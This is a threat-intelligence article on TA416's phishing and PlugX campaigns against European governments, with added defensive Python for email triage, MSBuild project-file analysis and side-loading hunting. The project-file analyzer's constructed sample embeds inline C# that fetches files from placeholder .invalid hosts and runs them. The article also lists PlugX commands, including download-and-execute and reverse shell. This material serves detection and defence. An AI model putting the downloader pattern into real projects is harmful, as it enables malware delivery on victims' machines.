China-aligned threat actor TA416 has resumed targeting European government and diplomatic organizations since mid-2025, using sophisticated phishing campaigns with OAuth redirects, web bugs, and custom PlugX malware variants.
A China-aligned threat actor known as TA416 has resumed targeting European government and diplomatic organizations since mid-2025, following a two-year period of minimal activity in the region. The campaign, attributed to the cluster also tracked as DarkPeony, RedDelta, Red Lich, SmugX, UNC6384, and Vertigo Panda, represents a significant shift in targeting priorities for this sophisticated cyber espionage group.
Sophisticated Attack Techniques Emerge
TA416 changes its infection chain frequently to evade detection: it has abused Cloudflare Turnstile challenge pages, leveraged OAuth redirects, and used C# project files to deliver its custom PlugX payload. Each change invalidates detections written for the previous chain, which is what makes the group hard to defend against with static indicators alone.
In December 2025, TA416 began abusing third-party Microsoft Entra ID cloud applications to initiate redirects that ultimately lead to the download of malicious archives. The phishing emails link to Microsoft's legitimate OAuth authorization endpoint with the client ID of such an application; when the link is clicked, the endpoint redirects the browser to the attacker-controlled domain registered as that application's redirect URI, from which the malicious archive that deploys the PlugX backdoor is served.
Multi-Vector Campaign Strategy
TA416's renewed focus on European entities involves a mix of web bug and malware delivery campaigns. The threat actors use freemail sender accounts to conduct reconnaissance and deploy the PlugX backdoor through malicious archives hosted on Microsoft Azure Blob Storage, Google Drive, domains under their control, and compromised SharePoint instances.
Web bugs—tiny invisible objects embedded in emails—trigger HTTP requests to remote servers when opened, revealing the recipient's IP address, user agent, and time of access. This reconnaissance technique allows the threat actor to assess whether emails were opened by intended targets before deploying more sophisticated malware.
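The two email-borne techniques above, the OAuth-endpoint link and the web bug, can both be triaged from the HTML body before anyone clicks. The following script is an added example written for this article, not code from the reporting it summarises or from TA416: it parses an email body, flags links to Microsoft's OAuth authorization endpoint whose `redirect_uri` leaves an assumed allow-list of trusted domains, and flags remote images that are 1x1/0x0 or hidden by inline style. The sample email, the `.invalid` hosts, the client IDs and the allow-list are all constructed for the demo.

```python
"""Triage of a TA416-style lure (added example for this article, not code from
the reporting it summarises).  Scans an HTML email body for (1) links to
Microsoft's OAuth authorization endpoint whose redirect_uri is not on an
allow-list, and (2) remote images sized or styled to be invisible, i.e. web
bugs.  SAMPLE_EMAIL and the allow-list are constructed for the demo."""
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

# Real Microsoft identity hosts that serve /oauth2/ authorization endpoints.
OAUTH_HOSTS = {"login.microsoftonline.com", "login.microsoft.com", "login.windows.net"}
# Assumed allow-list: redirect targets your own tenant's apps legitimately use.
TRUSTED_REDIRECT_SUFFIXES = (".microsoft.com", ".office.com", ".corp-example.invalid")


class _Collector(HTMLParser):
    """Collect <a href> values and <img> attribute dicts from the body."""
    def __init__(self):
        super().__init__()
        self.links, self.images = [], []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag == "img" and a.get("src"):
            self.images.append(a)


def _host_trusted(host):
    host = host.lower()
    return any(host == s.lstrip(".") or host.endswith(s) for s in TRUSTED_REDIRECT_SUFFIXES)


def check_oauth_link(url):
    """Flag an authorize URL whose redirect_uri leaves the trusted domain set."""
    p = urlparse(url)
    if p.hostname not in OAUTH_HOSTS or "/oauth2/" not in p.path:
        return None
    q = parse_qs(p.query)
    redirect = q.get("redirect_uri", [""])[0]
    rhost = urlparse(redirect).hostname or ""
    if not rhost or _host_trusted(rhost):
        return None
    return {"type": "oauth_redirect", "client_id": q.get("client_id", [""])[0],
            "redirect_host": rhost, "url": url}


def check_web_bug(img):
    """Flag a remote image that is 1x1/0x0 or hidden by inline style."""
    src = img["src"]
    p = urlparse(src)
    if p.scheme not in ("http", "https"):
        return None  # cid:/data: images cannot beacon to a server
    tiny = img.get("width", "") in ("0", "1") and img.get("height", "") in ("0", "1")
    style = img.get("style", "").replace(" ", "").lower()
    hidden = "display:none" in style or "visibility:hidden" in style
    if tiny or hidden:
        return {"type": "web_bug", "host": p.hostname, "url": src}
    return None


def triage_html(html):
    c = _Collector()
    c.feed(html)
    findings = [f for f in map(check_oauth_link, c.links) if f]
    findings += [f for f in map(check_web_bug, c.images) if f]
    return findings


# Constructed lure: one OAuth link redirecting to an attacker host, one whose
# redirect stays on a trusted domain, a normal inline logo, and a 1x1 pixel.
SAMPLE_EMAIL = """
<p>Please review the attached briefing.</p>
<a href="https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=11111111-2222-3333-4444-555555555555&amp;response_type=code&amp;redirect_uri=https%3A%2F%2Fdocs-review.invalid%2Fcb&amp;scope=openid">Open document</a>
<a href="https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=66666666-7777-8888-9999-000000000000&amp;response_type=code&amp;redirect_uri=https%3A%2F%2Fportal.office.com%2F&amp;scope=openid">Sign in</a>
<img src="cid:logo" width="120" height="40">
<img src="https://img-cdn.invalid/o.gif?id=abc123" width="1" height="1">
"""

if __name__ == "__main__":
    for finding in triage_html(SAMPLE_EMAIL):
        print(finding)
```

The check keys on the redirect target rather than the link host because the link host is, by design, a legitimate Microsoft domain; URL-reputation filters that stop at the host will pass it. The allow-list has to be maintained per tenant, and any `client_id` flagged here is worth looking up in Entra ID's enterprise applications to see whether the organisation ever consented to it.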
Advanced Malware Delivery Methods
In February 2026, TA416 refined its attack chain by linking to archives hosted on Google Drive or on compromised SharePoint instances. These archives contain a legitimate Microsoft MSBuild executable paired with a malicious C# project file. When MSBuild is run against the project file it builds it, and because MSBuild compiles and executes inline code tasks at build time, the project file itself acts as the downloader.
The CSPROJ file decodes three Base64-encoded URLs to fetch a DLL side-loading triad from TA416-controlled domains, saving them to the user's temp directory and executing a legitimate executable to load PlugX via the group's typical DLL side-loading chain.
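A project file used this way has two tell-tale properties that can be checked statically: a `UsingTask` element carrying inline source code, and string literals that are Base64-encoded URLs. The following analyzer is an added example written for this article, not code from the reporting or from TA416; it parses a `.csproj`, lists inline-code tasks, decodes quoted Base64 literals in their code and keeps the ones that are `http(s)` URLs, and notes whether the code references the temp directory or starts a process. The sample project and its three `.invalid` URLs are constructed, and the embedded C# is only there as input for the analyzer.

```python
"""Static triage of an MSBuild project file used as a downloader, as in the
chain described above.  Added example, not code from the article or from
TA416.  It lists UsingTask elements that embed inline code (which MSBuild
compiles and runs at build time) and decodes Base64 string literals in that
code that turn out to be URLs.  SAMPLE_CSPROJ and its URLs are constructed."""
import base64
import binascii
import re
import xml.etree.ElementTree as ET

# A quoted Base64 run of at least 16 characters inside the inline C# code.
B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')


def _local(tag):
    """Strip the MSBuild XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def find_inline_tasks(xml_text):
    """Return UsingTask elements that embed source code in a <Code> child."""
    tasks = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "UsingTask":
            continue
        code = next((c.text or "" for c in el.iter() if _local(c.tag) == "Code"), None)
        if code is not None:
            tasks.append({"task": el.get("TaskName"),
                          "factory": el.get("TaskFactory", ""), "code": code})
    return tasks


def decode_b64_urls(code):
    """Decode quoted Base64 literals and keep those that are http(s) URLs."""
    urls = []
    for literal in B64_LITERAL.findall(code):
        try:
            text = base64.b64decode(literal, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls


def analyze_csproj(xml_text):
    """One finding per inline task: decoded URLs plus two behavioural hints."""
    findings = []
    for t in find_inline_tasks(xml_text):
        code = t["code"]
        findings.append({
            "task": t["task"], "factory": t["factory"],
            "urls": decode_b64_urls(code),
            "writes_temp": "GetTempPath" in code,
            "starts_process": "Process.Start" in code,
        })
    return findings


# Constructed sample: three placeholder URLs standing in for a side-loading triad.
SAMPLE_URLS = ["https://files-a.invalid/Viewer.exe",
               "https://files-a.invalid/Viewer.dll",
               "https://files-b.invalid/Viewer.dat"]
_ENC = [base64.b64encode(u.encode()).decode() for u in SAMPLE_URLS]

SAMPLE_CSPROJ = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build"><Fetch /></Target>
  <UsingTask TaskName="Fetch" TaskFactory="CodeTaskFactory"
             AssemblyFile="$(MSBuildToolsPath)\\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Fragment" Language="cs"><![CDATA[
        string[] enc = { "__B64_0__", "__B64_1__", "__B64_2__" };
        string dir = System.IO.Path.GetTempPath();
        foreach (string e in enc) {
            string url = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(e));
            new System.Net.WebClient().DownloadFile(url, System.IO.Path.Combine(dir, System.IO.Path.GetFileName(url)));
        }
        System.Diagnostics.Process.Start(System.IO.Path.Combine(dir, "Viewer.exe"));
      ]]></Code>
    </Task>
  </UsingTask>
</Project>
""".replace("__B64_0__", _ENC[0]).replace("__B64_1__", _ENC[1]).replace("__B64_2__", _ENC[2])

if __name__ == "__main__":
    for finding in analyze_csproj(SAMPLE_CSPROJ):
        print(finding)
```

Inline tasks (`CodeTaskFactory` and `RoslynCodeTaskFactory`) are rare in project files that arrive by email, so their mere presence in an archive delivered alongside `MSBuild.exe` is already a strong signal; the decoded URLs give the hosts to block and to hunt for in proxy logs.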
PlugX Malware Capabilities
The PlugX backdoor remains a consistent presence throughout TA416's intrusions, though the legitimate, signed executables abused for DLL side-loading have varied over time. The malware establishes an encrypted communication channel with its command-and-control server after performing anti-analysis checks to sidestep detection.
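Because the signed host executable varies, a durable detection for this stage keys on the relationship between the executable and the DLL rather than on either file's name: a process running from a user-writable directory that loads an unsigned DLL from its own directory. The following hunting rule is an added example written for this article, not code from the reporting; it correlates Sysmon-style process-create and image-load records by `ProcessGuid`. The event records are constructed, and the `ProcessSigned` field on the create record is an assumed enrichment, since Sysmon's own process-create event does not carry signature status.

```python
"""Hunting rule for the side-loading stage described above: an executable
running from a user-writable directory loads an unsigned DLL from that same
directory.  Added example, not from the article.  EVENTS is a constructed
set of Sysmon-style records (EventID 1 process create, EventID 7 image load);
the ProcessSigned field on the create record is an assumed enrichment, since
Sysmon's own process-create event does not carry signature status."""
import ntpath

# Directories an unprivileged user can write to (lower-cased substrings).
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\users\\public\\",
                 "\\downloads\\", "\\programdata\\")


def in_user_writable(path):
    return any(m in path.lower() for m in USER_WRITABLE)


def detect_sideload(events):
    """Correlate image-load events with their process-create record."""
    procs, hits = {}, []
    for e in events:
        if e["EventID"] == 1:
            procs[e["ProcessGuid"]] = e
        elif e["EventID"] == 7:
            proc = procs.get(e["ProcessGuid"])
            if proc is None:
                continue
            exe_dir = ntpath.dirname(proc["Image"]).lower()
            dll_dir = ntpath.dirname(e["ImageLoaded"]).lower()
            if (exe_dir == dll_dir
                    and in_user_writable(proc["Image"])
                    and e.get("Signed", "false") != "true"):
                hits.append({"process": proc["Image"], "dll": e["ImageLoaded"],
                             "parent": proc.get("ParentImage"),
                             "process_signed": proc.get("ProcessSigned") == "true"})
    return hits


EVENTS = [
    # Signed viewer dropped in %TEMP% by the MSBuild stage, loading an unsigned DLL beside it.
    {"EventID": 1, "ProcessGuid": "g1",
     "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\Viewer.exe",
     "ParentImage": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe",
     "ProcessSigned": "true"},
    {"EventID": 7, "ProcessGuid": "g1",
     "ImageLoaded": "C:\\Windows\\System32\\ntdll.dll", "Signed": "true"},
    {"EventID": 7, "ProcessGuid": "g1",
     "ImageLoaded": "C:\\Users\\alice\\AppData\\Local\\Temp\\Viewer.dll", "Signed": "false"},
    # The same vendor binary in its install directory loading its own signed DLL: not flagged.
    {"EventID": 1, "ProcessGuid": "g2",
     "Image": "C:\\Program Files\\Vendor\\Viewer.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "ProcessSigned": "true"},
    {"EventID": 7, "ProcessGuid": "g2",
     "ImageLoaded": "C:\\Program Files\\Vendor\\Viewer.dll", "Signed": "true"},
]

if __name__ == "__main__":
    for hit in detect_sideload(EVENTS):
        print(hit)
```

Self-updating applications that live under `AppData` will produce some benign matches; prioritise hits where `process_signed` is true and the parent is a build tool or scripting host such as `MSBuild.exe`, which matches the delivery chain described earlier.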
PlugX accepts five different commands:
- 0x00000002: Capture system information
- 0x00001005: Uninstall the malware
- 0x00001007: Adjust beaconing interval and timeout parameter
- 0x00003004: Download a new payload (EXE, DLL, or DAT) and execute it
- 0x00007002: Open a reverse command shell
Geopolitical Motivations and Expansion
The shift back to European government targeting in mid-2025, following two years of focus on Southeast Asia and Mongolia, aligns with a renewed intelligence-collection focus against EU and NATO-affiliated diplomatic entities. Additionally, TA416 expanded to Middle Eastern government targeting in March 2026, likely influenced by geopolitical flashpoints and escalations in the region.
This campaign expansion follows the outbreak of the U.S.-Israel-Iran conflict in late February 2026, suggesting the group is gathering regional intelligence pertaining to the conflict.
Connection to Broader Threat Landscape
TA416 shares historical technical overlaps with another cluster known as Mustang Panda (aka CerenaKeeper, Red Ishtar, and UNK_SteadySplit). Both activity groups are collectively tracked under monikers including Earth Preta, Hive0154, HoneyMyte, Stately Taurus, Temp.HEX, and Twill Typhoon.
While TA416 uses bespoke PlugX variants, the Mustang Panda cluster has deployed tools like TONESHELL, PUBLOAD, and COOLCLIENT in recent attacks. What's common to both is the use of DLL side-loading to launch malware.
Industry Response and Detection
Microsoft has warned of phishing campaigns targeting government and public-sector organizations that employ OAuth URL redirection mechanisms to bypass conventional phishing defenses implemented in email and browsers. Because the visible link resolves to a legitimate Microsoft login domain, reputation-based URL filtering and a user's own check of the domain both pass it; the malicious destination only appears after the redirect.
The disclosure comes as Darktrace revealed that Chinese-nexus cyber operations have evolved from strategically-aligned activity in the 2010s to highly adaptive, identity-centric intrusions with intent to establish long-term persistence within critical infrastructure networks.
Based on a review of attack campaigns between July 2022 and September 2025, U.S.-based organizations accounted for 22.5% of all global events, followed by Italy, Spain, Germany, Thailand, the U.K., Panama, Colombia, the Philippines, and Hong Kong. A majority of cases (63%) involved exploitation of internet-facing infrastructure to obtain initial access.
In one notable case, the actor had fully compromised the environment and established persistence, only to resurface more than 600 days after the initial compromise. This operational pause underscores both the depth of the intrusion and the actor's long-term strategic intent.
The sophistication and persistence demonstrated by TA416 highlight the evolving nature of state-sponsored cyber espionage, with threat actors continuously adapting their techniques to target high-value diplomatic and government entities across multiple regions simultaneously.